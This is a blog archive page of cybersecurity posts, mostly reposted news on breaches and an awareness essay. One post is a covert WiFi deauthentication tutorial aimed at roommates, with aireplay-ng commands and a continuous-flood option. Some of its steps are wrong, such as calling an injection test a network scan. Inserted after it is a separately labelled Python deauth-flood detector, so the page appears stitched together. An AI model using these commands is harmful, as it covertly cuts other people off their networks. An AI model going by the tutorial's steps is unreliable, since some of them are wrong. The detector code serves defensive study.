Showing posts with label cybersecurity. Show all posts

Tuesday, 17 October 2017

Cyber Awareness in Daily Life

We all know there is a great need for cyber awareness. We have heard it on TV, read it on Facebook, posted about it, tweeted about it and done many other things about it. But why do we need it? Most people don't know. Don't worry, I'll try to explain it in an easy way, or at least that's what I'm trying to accomplish here. First, consider a scenario. You've recently bought a new house, and it holds things that you consider valuable. If you do not secure those valuables, there is a risk that they will get stolen, and then you'll get cranky, sad, and many other similar emotions will take over. To avoid this situation altogether, you employ security measures installed by professionals who keep in mind the current tricks and gadgets that thieves are using, because let's be honest, if we don't do that it is the same as personally handing the keys to our precious homes to intruders. If you've read carefully so far, you must have noticed that the main point was keeping in mind the current trends that the bad guys are using. So, if we take such precautionary measures to secure our homes, why can't we keep ourselves aware of the current trends in cyber security, when we live in a digital age surrounded by electronic devices 24/7 throughout the year?
The biggest attack of 2017 is WannaCry, and it could easily have been avoided if we had all been aware, in terms of cyber security of course. In April 2017 the Shadow Brokers released an SMB exploit named "EternalBlue", targeting a vulnerability addressed in Microsoft security bulletin MS17-010. The WannaCry ransomware takes advantage of this vulnerability to compromise Windows machines, load malware, and propagate to other machines on a network. The attack uses SMB version 1 over TCP port 445 to propagate, and it mainly affected systems still running Windows XP, for which Microsoft had long since stopped releasing security updates. If we take some time and Google the reasons behind the destruction caused by a cyber attack, we find that the main ingredient was always a lack of awareness. There is an age-old saying, "Prevention is better than cure", and the P in this saying stands for awareness, because how can we prevent something from happening if we don't have even the slightest idea about it?

Author's Comment: People will keep on writing articles like this, maybe better or worse than this one. There are countless more on the web, but let's face it, hackers will keep on hacking systems for a long time to come. The reason is that human beings tend not to learn lessons until they have suffered, and we already know that time is the worst teacher there is, because it first gives you the test and then teaches you the lesson. We can keep on writing countless articles like this, but it's of no use, as the people who read it will probably remember it for some time and then forget about it, which is literally how we live.

Thursday, 22 June 2017

How to kick someone out from WiFi using Kali Linux

Are you fed up with your annoying roommates or flatmates because they are using all the bandwidth of your WiFi connection?

Here is the solution for you people to kick that annoying friend of yours off the WiFi without letting them know.


This process needs the aircrack-ng tool suite. If you are using any penetration testing Linux distro then you don't have to install it; other users have to install this tool.

First open a new terminal and type in ifconfig to find the name of your wireless card (in my case the name is wlan0).

Now take down your wireless card with this command:

ifconfig wlan0 down

Don't worry, at the end of this tutorial I will tell you how to bring it back up.

Now we will scan for networks (we will get the network BSSID and channel).

Use this command to scan for networks:

aireplay-ng -9 wlan0

Now we will scan for connected devices on the network:

airodump-ng -c 6 --bssid xx:xx:xx:xx:xx:xx -w psk wlan0

-c is for the channel that the network is broadcasting on.

--bssid is for the network MAC address we just wrote down.

Now we just wait a few seconds; after some time the connected devices will show up here with their MAC addresses.

Write down the MAC address of the device you want to kick off your network.

Now we will kick the device off our network.

To do that use this command:

aireplay-ng -0 15 -a xx:xx:xx:xx:xx:xx -c yy:yy:yy:yy:yy:yy wlan0

-0 means that we will send deauth packets to the device.

15 is the number of deauth packets (if you want to send deauth packets continuously then replace 15 with 0).

-a sets the network's BSSID which we wrote down earlier.

-c sets the MAC address of the device that you would like to kick off the network.

Great! Now we are sending the deauth packets! The device should now be disconnected from the network.

Now it's time to bring your wireless card back up. If your card is down you won't be able to connect to a WiFi network.

Type in:

ifconfig wlan0 up

Author- Arun Kumar (CEH)
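For the defender's side of the deauth traffic described above, here is an added example (not code from the original post) that decodes raw 802.11 management frames, groups deauthentication frames per (BSSID, station) pair and flags a pair when the count inside a sliding time window reaches a threshold. The MAC addresses and the frames in SAMPLE_CAPTURE are constructed placeholders, and the frames are assumed to carry no radiotap header.

```python
"""Deauthentication-flood detector over raw 802.11 management frames.

Added example, not part of the original post. Frame Control byte 0 holds
protocol version (bits 0-1), type (bits 2-3) and subtype (bits 4-7);
deauthentication is management type 0, subtype 12 (0xC0). The header is
FC(2) + duration(2) + addr1/2/3 (3 x 6) + sequence control(2) = 24 bytes,
followed for deauth frames by a 16-bit little-endian reason code.
"""
import struct
from collections import defaultdict

MGMT_TYPE = 0
DEAUTH_SUBTYPE = 12
HEADER_LEN = 24


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def mac_bytes(text: str) -> bytes:
    return bytes(int(part, 16) for part in text.split(":"))


def parse_frame(frame: bytes):
    """Decode one raw 802.11 frame header; returns None if it is too short."""
    if len(frame) < HEADER_LEN:
        return None
    fc0 = frame[0]
    ftype = (fc0 >> 2) & 0x3
    subtype = (fc0 >> 4) & 0xF
    info = {
        "type": ftype,
        "subtype": subtype,
        "addr1": mac_str(frame[4:10]),
        "addr2": mac_str(frame[10:16]),
        "addr3": mac_str(frame[16:22]),
        "deauth": ftype == MGMT_TYPE and subtype == DEAUTH_SUBTYPE,
        "reason": None,
    }
    if info["deauth"] and len(frame) >= HEADER_LEN + 2:
        info["reason"] = struct.unpack_from("<H", frame, HEADER_LEN)[0]
    return info


def detect_deauth_floods(capture, window=10.0, threshold=10):
    """Flag (BSSID, station) pairs seeing >= threshold deauth frames in any
    `window` seconds. `capture` is an iterable of (timestamp, raw_frame).
    Returns {(bssid, station): peak count inside one window}."""
    times_by_pair = defaultdict(list)
    for ts, frame in capture:
        info = parse_frame(frame)
        if not info or not info["deauth"]:
            continue
        # addr3 carries the BSSID; whichever of addr1/addr2 is not the BSSID
        # is the station, so both directions of a deauth burst map to one pair.
        bssid = info["addr3"]
        station = info["addr2"] if info["addr1"] == bssid else info["addr1"]
        times_by_pair[(bssid, station)].append(ts)

    alerts = {}
    for pair, times in times_by_pair.items():
        times.sort()
        start = 0
        for end in range(len(times)):
            while times[end] - times[start] > window:   # slide window start
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[pair] = max(alerts.get(pair, 0), count)
    return alerts


def build_frame(fc0, addr1, addr2, addr3, body=b""):
    """Build a minimal raw 802.11 frame for the constructed sample capture."""
    return (bytes([fc0, 0x00]) + b"\x00\x00"
            + mac_bytes(addr1) + mac_bytes(addr2) + mac_bytes(addr3)
            + b"\x00\x00" + body)


# Constructed sample values (placeholders, not real devices).
AP_BSSID = "00:11:22:33:44:55"
VICTIM = "aa:bb:cc:dd:ee:ff"
OTHER_AP = "66:77:88:99:aa:bb"
OTHER_STA = "cc:dd:ee:ff:00:11"
REASON_7 = struct.pack("<H", 7)  # reason 7: class 3 frame from non-associated STA

SAMPLE_CAPTURE = [
    (0.0, build_frame(0x80, "ff:ff:ff:ff:ff:ff", AP_BSSID, AP_BSSID)),  # beacon
    (0.5, build_frame(0x08, AP_BSSID, VICTIM, AP_BSSID)),               # data frame
    (1.0, build_frame(0xC0, OTHER_STA, OTHER_AP, OTHER_AP, REASON_7)),  # lone deauth
]
# A burst of 15 deauth frames, alternating direction, 0.2 s apart, against
# one station (mirroring the "-0 15" count used in the post).
for i in range(15):
    to_station = build_frame(0xC0, VICTIM, AP_BSSID, AP_BSSID, REASON_7)
    to_ap = build_frame(0xC0, AP_BSSID, VICTIM, AP_BSSID, REASON_7)
    SAMPLE_CAPTURE.append((2.0 + 0.2 * i, to_station if i % 2 == 0 else to_ap))


if __name__ == "__main__":
    for (bssid, station), count in detect_deauth_floods(SAMPLE_CAPTURE).items():
        print(f"deauth flood: bssid={bssid} station={station} frames={count}")
```

Unprotected deauth frames are forgeable by design; networks that enable 802.11w Protected Management Frames authenticate them, so a monitor like this is most useful where PMF is not yet deployed.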


Monday, 5 June 2017

What is the difference between Nessus and OWTF ?

Many of you may be wondering what the difference is between Nessus and OWTF (Offensive Web Testing Framework).

First of all, Nessus is a vulnerability assessment tool and OWTF is a penetration testing tool.

Secondly, Nessus is proprietary to Tenable, and OWTF (made by OWASP) is open source and free.

OWTF has both a CLI and a web-based UI, whereas Nessus only has a web UI and no CLI (but it has NASL, the Nessus Attack Scripting Language).

Nessus is the world's most popular vulnerability scanner whereas OWTF is relatively new.

Nessus has more than 15,000 plugins, whereas OWTF has more than 100.

Nessus is available for Windows, Mac and Linux, but OWTF is only available for Linux; in particular, OWTF is designed with Kali Linux in mind.

OWTF runs tools like theHarvester, Nikto, w3af, Arachni, etc.

Nessus rates each vulnerability as Critical, High, Medium, Low or Info using its CVSS score, whereas in OWTF the user has to rate the vulnerabilities manually.

Nessus can also be used for auditing purposes whereas OWTF cannot.
Now, to understand this, we must first understand that vulnerability assessment is a part of penetration testing. What Nessus does is find the vulnerabilities of a host, whereas OWTF is a tool that automates the task of penetration testing by chaining a number of tools that the penetration tester would otherwise have to run manually.

For example, a pen tester would do port scanning to find the open ports on a host using a tool like Nmap, then find the versions of the services running on that host, then find the vulnerabilities in those service versions, and then try to exploit those vulnerabilities using a tool like Metasploit. What we see here is that the penetration tester takes the output of one tool and uses it as input to the next.

OWTF does this automatically: it runs a tool to get output, then uses that output as input to another tool to move forward in the penetration testing process.

OWASP OWTF is built around the OWASP Pen Testing Guide, the Penetration Testing Execution Standard and National Institute of Standards and Technology guidelines.

Wednesday, 23 December 2015

Researchers think that a dangerous 'back door' in software used by the US government was caused by the NSA

Juniper is a hardware manufacturer that makes networking equipment. The internet relies on equipment like this to function.
A backdoor is an intentional hole in a security system that allows someone to get in when they shouldn't be able to. Think of a robber slipping in the backdoor of your house because you never lock it.
Juniper announced that it found a backdoor into its systems that it didn't place there. To continue my analogy above, imagine one day you found a new door into your house that you never knew existed, and that you don't even have a key for.
There is speculation that the NSA was responsible for putting this backdoor into Juniper's system, but nothing concrete yet.

Two "back doors" hidden in security software used by US government agencies and corporations that left them open to attack may have been caused by the NSA, security researchers claim.
Last week, news broke about "unauthorised code" in devices sold by Juniper, which builds firewalls intended to protect the user from attacks and unwanted intrusions. Wired reports that research by Ralf-Philipp Weinmann, founder of security consultancy Comsecuris, indicates that the NSA may be responsible for this, by introducing code that was exploitable by others.

Matthew Green, a cryptography lecturer at Johns Hopkins University, has come to a similar conclusion. In a blog post also outlining the scale of the vulnerability, he wrote:

To sum up, some hacker or group of hackers noticed an existing backdoor in the Juniper software, which may have been intentional or unintentional -- you be the judge! They then piggybacked on top of it to build a backdoor of their own, something they were able to do because all of the hard work had already been done for them. The end result was a period in which someone -- maybe a foreign government -- was able to decrypt Juniper traffic in the U.S. and around the world.

If correct, the NSA likely introduced this back door in order to give them a way to surreptitiously monitor traffic: It allowed them to decrypt otherwise-encrypted data, for a start. But someone else - we don't yet know who - found it, and took advantage.

Juniper has since released patches addressing the vulnerabilities, and is urging customers to upgrade.

This isn't just some abstract theoretical breach. Often, when there's a hack, or leak, or vulnerability, there's no evidence it was ever exploited by anyone other than the security researcher who found it. But in this case, the code was actively put there by an as-yet unknown hacker - and attackers are now actively probing for unpatched Juniper firewalls to exploit.

Researchers at the SANS Internet Storm Center built a "honeypot," PC World reports - that is, a fake server that pretends to be a real Juniper firewall so they can monitor if anyone is fooled into trying to attack it. Sure enough, they say they are "detecting numerous login attempts against our ssh honeypots using the ScreenOS backdoor password."

The Juniper back door comes at a time of heated debate over the ethics and feasibility of introducing back doors into software. As more and more big tech companies (Apple, Google, Facebook, etc.) incorporate strong encryption into their products, there has been a pushback from law enforcement who want to be able to retain access to data and communications when required.

But, technologists and privacy activists counter, any back door will inevitably be open to abuse by third parties. You can't build a back door that only good guys can use, the saying goes. In Juniper, encryption enthusiasts may have found a very powerful example to prove their point.

Monday, 26 October 2015

TalkTalk hires BAE Systems to investigate cyber attack

A man walks past a company logo outside a TalkTalk building in London, Britain October 23, 2015.
British broadband provider TalkTalk said on Sunday it had hired defense company BAE Systems to investigate a cyber attack that may have led to the theft of personal data from its more than 4 million customers.

TalkTalk said on Friday it had received a ransom demand from an unidentified party for the attack, which has led to calls for greater regulation of how companies and public bodies manage personal data.

"BAE Systems are supporting us as we investigate this week's cyber attack," a spokeswoman for TalkTalk said, declining to give further details due to the ongoing investigation.

A spokeswoman for BAE's Applied Intelligence division said the company's cyber-specialists were analyzing "vast quantities" of data to help establish how the breach happened and what information was stolen.

The Metropolitan Police Cyber Crime Unit is also conducting a criminal investigation into the attack.

While TalkTalk said on Saturday it did not believe the information accessed would enable hackers to steal money from its customers, British newspapers on Sunday carried stories of individuals who said callers posing as TalkTalk employees had taken money from their bank accounts.

Many customers took to social media to complain about their treatment following the attack, TalkTalk's third data breach this year, with media also reporting some had been told they faced hundreds of pounds in fees to leave the provider.

Britain's Information Commissioner watchdog, which can impose fines of up to 500,000 pounds ($765,600), has said it is looking into the incident but security experts said the prevalence of cyber crime showed more needed to be done.

Data released by the Office for National Statistics this month showed there were nearly 2.5 million incidents of cyber crime in the year to June 2015.

Simon Moores, chair of the International eCrime Congress and a former government technology ambassador, said so far the commissioner had proved "somewhat toothless".

"The Information Commissioner needs to have more powers to reflect the direction of travel ... at a time of rampant identity theft and exploitation of financial details," Moores told Reuters.

He said Britain should give responsibility for information security to a single minister rather than have it spread across several government departments.

"You need to encourage a culture and a level of responsibility where all large organizations ... take serious ownership and responsibility for the privacy of people’s financial and personal data rather than having a cavalier attitude, which we have seen in so many cases," he said.
Source Reuters

Sunday, 9 August 2015

Russia Hacks Pentagon; Shuts Down Joint Chiefs Of Staff Email System

A Russian cyber attack around July 25 shut down the Pentagon’s Joint Chiefs of Staff’s unclassified email system for 11 days and affected around 4,000 military and civilian personnel who work for the Joint Chiefs. No classified information was taken or put at risk. Only unclassified email accounts were infiltrated.

Lieutenant Colonel Valerie Henderson, Pentagon spokeswoman, told the Daily Mail Online, “Joint Staff unclassified networks for all users are currently down. We continue to identify and mitigate cyber security risks across our networks. With those goals in mind, we have taken the Joint Staff network down and continue to investigate. Our top priority is to restore services as quickly as possible. As a matter of policy and for operational security reasons, we do not comment on the details of cyber incidents or attacks against our networks.”

At a news briefing, Navy Capt. Jeff Davis told reporters that the attack did not threaten military operations since it was limited to the unclassified network. Until the system is resolved, the Joint Staff is operating on an alternative, classified system. The network remains offline; it is expected to be back online before the end of the week.

The US military officials believe that the complexity and advanced nature of the hack strongly suggests that state-sponsored Russian hackers were behind the intrusion on sensitive US government computer networks. The Defense Department disclosed the attack shortly after it occurred but only in recent days have investigators traced it to Russia.

“This attack was fairly sophisticated and has the indications . . . of having come from a state actor such as Russia,” said a US official on the condition of anonymity to discuss details of the investigation.

According to NBC, the sophisticated cyber intrusion relied on an automated system to download large amounts of data and distribute it to thousands of different accounts on the Internet. It's suspected the hackers used encrypted social media accounts to coordinate the attack. According to The Daily Beast, hackers broke into unclassified email networks by sending emails that initially seemed legitimate, but ended up being malware or 'spear phishing' attempts.

In April, Defence Secretary Ashton Carter had confirmed that Russian hackers had briefly broken into the Pentagon’s unclassified networks. The hackers, believed to have Moscow backing, penetrated both the State Department and White House networks in October 2014. US President Barack Obama’s personal schedule was among the sensitive data that was compromised.


Wednesday, 8 July 2015

Symantec in talks to sell Veritas storage unit to Carlyle: source

Carlyle Group co-founder and CEO David Rubenstein participates in the Washington Ideas Forum, in Washington October 29, 2014.
Software security company Symantec Corp (SYMC.O) is in talks to sell its Veritas data storage business to private equity firm Carlyle Group LP (CG.O), a person familiar with the matter said on Tuesday.

The exact status of the talks could not be learned. Bloomberg News reported earlier that Symantec was nearing a deal to sell Veritas to Carlyle for between $7 billion and $8 billion, citing people with knowledge of the matter.

The Reuters source asked not to be identified because the negotiations are confidential. Symantec did not immediately respond to a request for comment, while Carlyle declined to comment.

Symantec shares rose 2.64 percent in after-hours trading, after closing up 0.5 percent, at $22.79, in regular trade on the Nasdaq.

Symantec has been seeking buyers for Veritas for several months but interest from potential buyers had been limited because of a tax burden associated with splitting the company.

Symantec had been planning to separate its business focused on corporate and consumer security software, which had $4.2 billion in revenue last year, from Veritas, which has about $2.5 billion in revenue. It announced the tax-free spinoff last October.

Investor pressure has been building on legacy technology companies such as Symantec to become more agile and capitalize on faster-growing businesses, whether it's through corporate breakups or divestitures.

In addition to Symantec, Hewlett-Packard Co (HPQ.N) and eBay Inc (EBAY.O) have announced major breakups and spinoffs, and more could be on the way. Activist investor Elliott Management has been pressuring EMC Corp (EMC.N) to sell its stake in VMWare (VMW.N) and has urged Citrix Systems (CTXS.O) to create more shareholder value and sell some of its businesses.

China's parliament publishes draft cybersecurity law

China's parliament has published a draft cybersecurity law that consolidates Beijing's control over data, with potentially significant consequences for internet service providers and multinational firms doing business in the country.

The document, dated Monday but picked up by state media on Wednesday, strengthens user privacy protection from hackers and data resellers but simultaneously elevates the government's powers to access, obtain records and block dissemination of private information deemed illegal under Chinese law.

The law has been under discussion in China for months.

Citing the need "to safeguard national cyberspace sovereignty, security and development," the proposed legislation is a milestone in China's effort to bolster its network against threats to the country's stability.

It will also enable the government to better regulate the flow of information in China.

Earlier in July, China's largely rubber stamp parliament passed a sweeping national security law that tightened government control in politics, culture, the military, the economy, technology and the environment.

But cybersecurity has been a particularly irksome area in relations with economic partners like the United States, which sees many recently proposed rules as burdensome or unfair to Silicon Valley firms.

Under the draft law, internet service providers must store data collected within China on Chinese territory; data stored overseas for business purposes must be government-approved. Network equipment must also be approved under testing standards issued by China's cabinet.

The government also reiterated its longstanding objective of requiring internet users to log in with their real names to services like messaging apps - though such drives have failed in the past.

The parliament said government agencies would issue additional guidelines for network security in "critical industries" such as telecoms, energy, transport, finance, national defence and military matters, government administration and other sensitive fields.

Parliament will take feedback on the proposed legislation until Aug. 5.

Source Reuters

Thursday, 2 July 2015

U.S. Intelligence Chief Points Finger at China for Data Hack

James Clapper

Large data breach left millions of Social Security numbers exposed

The most senior U.S. intelligence official has openly implicated China in a large hack of U.S. government data.

James Clapper, the U.S. Director of National Intelligence, said Thursday that China was a “leading suspect” in a recent security breach that saw millions of personnel records of Americans stolen from government computers.

Previously, U.S. officials hadn’t named a suspect for the breach, which was disclosed in early June. Clapper mentioned China at an intelligence conference in Washington, D.C. “You have to kind of salute the Chinese for what they did,” he said, noting the difficulty of the attack.

Earlier this year Barack Obama signed an executive order that grants the Treasury greater ability to impose sanctions on countries who conduct cyberattacks against the U.S. China has denied involvement in the attack, which may have exposed as many as 18 million Social Security numbers.

Source Time 

Wednesday, 17 June 2015

Fed agency blames giant hack on 'neglected' security system

Office of Personnel Management (OPM) Director Katherine Archuleta testifies on Capitol Hill
The agency that allowed hackers linked to China to steal private information about nearly every federal employee — and detailed personal histories of millions with security clearances — failed for years to take basic steps to secure its computer networks, officials acknowledged to Congress on Tuesday.

Democrats and Republicans on the House Oversight and Government Reform Committee spoke in unison to describe their outrage over what they called gross negligence by the Office of Personnel Management. The agency's data was breached last year in two massive cyberattacks only recently revealed.

The criticism came from within, as well. Michael Esser, the agency's assistant inspector general for audit, detailed a yearslong failure by OPM to adhere to reasonable cybersecurity practices, and he said that for a long time, the people running the agency's information technology had no expertise.

Last year, he said, an inspector general's audit recommended that the agency shut down some of its networks because they were so vulnerable. The director, Katherine Archuleta, declined, saying it would interfere with the agency's mission.

The hackers were already inside her networks, she later acknowledged.

"You failed utterly and totally," said committee Chairman Jason Chaffetz, a Utah Republican. "They recommended it was so bad that you shut it down and you didn't."

Archuleta, stumbling occasionally under withering questions from lawmakers, sought to defend her tenure and portray the agency's problems as decades in the making as its equipment aged. She appeared to cast blame on her recent predecessors, one of whom, John Berry, is the U.S. ambassador to Australia.

Offered chances to apologize and resign, she declined to do either.

Chaffetz said the two breaches "may be the most devastating cyberattack in our nation's history," and said OPM's security policy was akin to leaving its doors and windows unlocked and expecting nothing to be stolen.

"I am as distressed as you are about how long these systems have gone neglected," Archuleta said, adding at another point, "The whole of government is responsible and it will take all of us to solve the issue."

Archuleta and the other witnesses offered few new details about the breaches in the public hearing, deferring most questions about methods and damage to a later, classified session.

After that session, Rep. Elijah Cummings of Maryland, the committee's ranking Democrat, demanded that the committee hear testimony from two OPM contractors, KeyPoint and USIS, that fell victim to hacks last year. Earlier, Cummings and other lawmakers questioned whether the OPM network was compromised first through hacking of the contractors, and OPM officials declined to answer.

During the open hearing, Donna Seymour, the agency's chief information officer, confirmed that personnel information on 4.2 million current and former federal employees had been stolen, not just accessed.

The number of security clearance holders whose data has been taken is not yet known, she said. But the records go back to 1985 and include contractors as well as federal employees. Some government officials estimate the number could be up to 14 million.

And because their security clearance applications contain personal information about friends and family, those people's data is vulnerable as well.

Seymour also disclosed that any federal employees who submitted service history records to OPM, whether or not their personnel records are kept by the agency, likely had their information stolen. That raised the specter that intelligence agency employees who were not kept in the main personnel system for security reasons may have been exposed anyway.

Another fear is that covert intelligence officers working undercover as government employees may have been made vulnerable. If their names are not in the federal employee database, that could be revealing to foreign adversaries; there also could be holes in any bogus employee record built for spying cover purposes.

Andy Ozment, a top Department of Homeland Security cyber official, said the hackers gained access to OPM's network using stolen credentials.

That was important because many lawmakers and outside experts had criticized OPM for failing to take the obvious step of encrypting sensitive data, including Social Security numbers. Ozment said attackers with network credentials could have accessed encrypted data, anyway.

Rep. Will Hurd, a Texas Republican and former covert CIA officer, said he didn't doubt the good intentions of the OPM witnesses, but "the execution has been horrific."

China denies involvement in the cyberattack, and no evidence has been aired publicly proving Chinese involvement although the government says it has "moderate confidence" China was involved.

Lawmakers voiced fears Tuesday that China will seek to gain leverage over Americans with access to secrets by pressuring their overseas relatives and contacts, particularly if they happen to be living in China or another authoritarian country.

"China now has a list of Chinese citizens worldwide who are in close contact with American officials and they can use that for espionage purposes," said Rep. Ron DeSantis, a Florida Republican.

In the cyberattack targeting federal personnel records, hackers are believed to have obtained the Social Security numbers, birth dates, job actions and other private information on every federal employee and millions of former employees and contractors.

In the other attack, which the Obama administration acknowledged on Friday after downplaying the possibility for days, the cyber spies got detailed background information on millions of military, intelligence and other personnel who have been investigated for security clearances.

Applicants for security clearances are required to list drug use, criminal convictions, mental health issues, and the names and addresses of their foreign relatives.

"The 'friends and family' dataset is ultimately the most useful for a hostile intelligence service," said Richard Zahner, a retired lieutenant general and former top NSA official. Tie the information to what's publicly available, and other intelligence the adversary has already collected, "and you have insights that few services have ever achieved."

The personnel records hack comes in a long line of other cyber breaches linked to China and targeting the personal information of Americans, including one in January against health insurer Anthem.

"The United States of America is under attack," Cummings said. "Sophisticated cyber spies, many from foreign countries, are targeting the sensitive personnel information of millions of Americans. They are attacking our government, our economy, our financial sector, our health care systems and virtually every single aspect of our lives."

Source AP

Wednesday, 15 April 2015

Government watchdog says that in-flight WiFi could allow hackers to hijack planes

In a report released earlier this week, U.S. government watchdog group GAO (Government Accountability Office) warned that the increasing connectivity of our aircraft, from flight tracking technologies to in-flight WiFi, could give hackers an access point to tap in and potentially hijack a flight.

“New networking technologies connecting FAA’s ATC information systems expose these systems to new cybersecurity risks, potentially increasing opportunities for systems to be compromised and damaged,” says the GAO.

“Such damage could stem both from attackers seeking to gain access to and move among information systems, and from trusted users of the systems, such as controllers or pilots, who might inadvertently cause harm.”

Speaking with FAA officials and experts, the GAO discovered that older, legacy systems are actually more difficult to access remotely than many modern systems, as the old systems do not connect directly to the FAA over the Internet. On the other hand, the NextGen systems will interoperate with one another, which means that if one system is compromised, others will be at risk as well.

The GAO says that although the FAA is “taking steps” to improve cybersecurity, there is more that can be done to protect our airlines from cyber threats.

“While FAA is working to transform the organization of its cybersecurity efforts,” says the GAO, “the experts we consulted said that it could improve upon those efforts by including all key stakeholders in its agency-wide approach. All 15 of our cybersecurity and aviation experts agreed that organizational clarity regarding roles, responsibilities, and accountability is key to ensuring cybersecurity across the organization.”


Friday, 3 April 2015

EXCLUSIVE: Sophisticated bank transfer cyber scam uncovered by IBM

A worker is pictured behind a logo at the IBM stand on the CeBIT computer fair in Hanover February 26, 2011. The world's largest IT fair CeBIT opens its doors on March 1 and runs through March 5.
IBM has uncovered a sophisticated fraud scheme run by a well-funded Eastern European gang of cyber criminals that uses a combination of phishing, malware and phone calls that the technology company says has netted more than $1 million from large and medium-sized U.S. companies.
The scheme, which IBM security researchers have dubbed "The Dyre Wolf," is small in comparison with more recent widespread online fraud schemes but represents a new level of sophistication.
According to IBM, since last year the attackers have been targeting people working in companies by sending spam email with unsafe attachments to get a variant of the malware known as Dyre into as many computers as possible.
If installed, the malware waits until it recognizes that the user is navigating to a bank website and instantly creates a fake screen telling the user that the bank's site is having problems and to call a certain number.
If users call that number, they get through to an English-speaking operator who already knows what bank the users think they are contacting. The operator then elicits the users' banking details and immediately starts a large wire transfer to take money out of the relevant account.
The use of a live phone operator is what makes the scheme unique, said Caleb Barlow, vice president of IBM Security.
"What's very different in this case, is we saw a pivot of the attackers to use a set of social engineering techniques that I think are unprecedented," said Barlow. "The focus on wire transfers of large sums of money really got our attention."
IBM did not release any details on which companies fell prey to the scheme or the location of the perpetrators.
Once the transfer is complete, the money is then quickly moved from bank to bank to evade detection. In one instance, IBM said, the gang hit the victim company with a denial of service attack - essentially bringing down their Web capabilities - so it would not discover the theft until much later.
International Business Machines Corp's security unit is recommending that companies make sure employees are trained in spotting phishing attacks - where emails or attachments can infect a computer - and to never provide banking credentials to anyone.

The unit published a blog on the issue on its site.
Source Reuters

Tuesday, 31 March 2015

Anonymous Hackers Threaten Israel with 'Electronic-Holocaust' on 7th April

The famous cyber hacker group Anonymous has vowed an 'Electronic Holocaust' against Israel in response to what the group calls 'crimes in the Palestinian territories'.
In a spooky video "message to Israel" posted on YouTube March 4, Anonymous declared yet another cyber attack on April 7, which is one week before Holocaust Remembrance day.

Delivered in the style of a news broadcast, the video clip shows a man wearing an Anonymous mask and threatening to take down Israeli servers and websites related to critical infrastructure next week, promising to 'erase you from cyberspace'.
"We will erase [Israel] from cyberspace in our electronic Holocaust," says the video. "As we did many times, we will take down your servers, government websites, Israeli military sites, and Israeli institutions."
The cyber activist group declared Palestinian youths a 'symbol of freedom', and urged them to "never give up. [Anonymous] are with you and will continue to defend you." The group criticized the Israeli government, saying that it has not stopped "endless human right violations" and "illegal settlements."
The video is subtitled in Arabic and delivered in an English electronic voice, possibly to hide the identity of the real speaker. The footage includes images of Israeli Prime Minister Benjamin Netanyahu sitting with military leaders and members of his cabinet, as well as images from the Gaza conflict.
The video also shows images of injured Palestinian children and bombed areas that appear to date from Operation Protective Edge conducted by the Israel Defence Forces (IDF) last summer.
"[Israeli government] killed thousands of people, as in the last war against Gaza in 2014. [Israel] have shown that you do NOT respect international law," says the electronic voice, promising "We are coming back to punish you again."
"We always say expect us but you always fail. We are unexpected; we’ll show on 7 April 2015 what the electronic holocaust mean…," the video continues.
Anonymous then continued with a message to the "foolish Benjamin Netanyahu, and all leaders in the Zionist entities" warning that cyber attacks on Israeli government websites, sensitive data and devices will continue "until the people of Palestine are Free."
In the past, Anonymous has targeted Israel a number of times. A cyber attack, called OpIsrael, in April 2013 claimed to have caused $3 billion worth of damage to Israel, when the group targeted about 30,000 Israeli bank accounts, 100,000 websites, 5,000 Twitter accounts and over 40,000 Facebook pages.

During Operation OpIsrael, the Anonymous hacking group published the personal data of 5,000 Israeli officials over the Internet, which included names, ID numbers and personal email addresses.
Past targets of the hacktivist group include the official websites of the Israeli prime minister, the Bank of Israel, the Israeli Defense Force (IDF), the Embassy of Israel to the United States and the Israeli President's official website.

Source The Hacker News

Saturday, 21 March 2015

Common data breaches lead to an increase in cybersecurity IPOs (initial public offerings) as companies spend more on security

Rapid7, LogRhythm and Mimecast are joining a growing list of cybersecurity firms planning to go public in 2015 to capitalize on investor interest following a spate of hacker attacks, according to people familiar with the matter.

Shares of publicly traded cybersecurity firms have outperformed the market in recent months, as high-profile data breaches at Sony Corp, JPMorgan Chase & Co and Anthem Inc prompt businesses to spend more to secure their computer networks.

"The cybersecurity market is in the early innings of a massive growth opportunity," said FBR Capital Markets analyst Daniel Ives. "There are many innovative private security vendors. Tech investors' eyes are glued to who has the 'magic solution.'"

Boston-based Rapid7 provides software and services that help businesses assess and monitor security risks. It has more than 3,500 customers, including Inc, American Express Co and Bank of America Corp.

Mimecast, also based in Boston, is an email security firm with 10,000 customers. According to its website, revenue rose 30 percent in 2014 to $88.4 million. LogRhythm Inc, based in Boulder, Colorado, provides technology to help companies monitor activity across their networks.

All three companies are planning to sell shares to the public and seeking valuations in excess of $1 billion, according to people familiar with the matter, who declined to be identified because the plans are not yet public.

Rapid7, whose investors include Bain Capital Ventures and Technology Crossover Ventures, has chosen Morgan Stanley and Barclays to assist with an initial public offering, the people said.

LogRhythm, whose investors include Access Venture Partners, Adam Street Partners, Grotech Ventures and Riverwood Capital, has chosen JPMorgan Chase and Morgan Stanley for an IPO in the second half of the year, the sources said.

Mimecast, whose investors include Insight Venture Partners, Dawn Capital and Index Ventures, has spoken to some investment banks about an IPO later this year but has not hired any firms, the sources said.

Representatives from the three companies and the banks working with them all declined to comment.


With global spending on IT security set to increase 8.2 percent in 2015 to $77 billion, according to market research firm Gartner, the shares of publicly traded cybersecurity firms have done well.

FireEye Inc shares have risen 38 percent so far this year, while Qualys Inc is up 24 percent and Palo Alto Networks Inc has climbed 19 percent. The PureFunds ISE Cyber Security ETF has gained 9 percent over the same period, while the S&P 500 Index is up 1.9 percent.

But investing in cybersecurity is not without risk.

FireEye's share price plunged more than 70 percent in less than three months last year, after Chief Executive Dave DeWalt and other insiders sold shares, spurring investors to take a more critical look at the firm's finances and valuation.

The stock had more than quadrupled in the first six months after its September 2013 IPO, even though FireEye later reported losses of $121 million in 2013 and $444 million in 2014. Analysts do not expect FireEye to post a full-year net profit until 2018, though they are forecasting rapid revenue growth, according to Thomson Reuters data.

Amid investor enthusiasm for the cybersecurity industry, FireEye has recovered this year though at around $42 a share, the stock remains far below its March 2014 high of $97.35.

Rapid7, LogRhythm and Mimecast are not the only cybersecurity firms planning to tap public markets this year.

Veracode, which protects Internet applications from hackers, has selected banks to lead a potential IPO that could value the company at between $600 million and $800 million, Reuters reported in December.

Another company widely expected to debut this year is Bit9 + Carbon Black, whose software protects computers from malware. The firm has not yet hired banks, according to people familiar with the matter. It declined to comment.

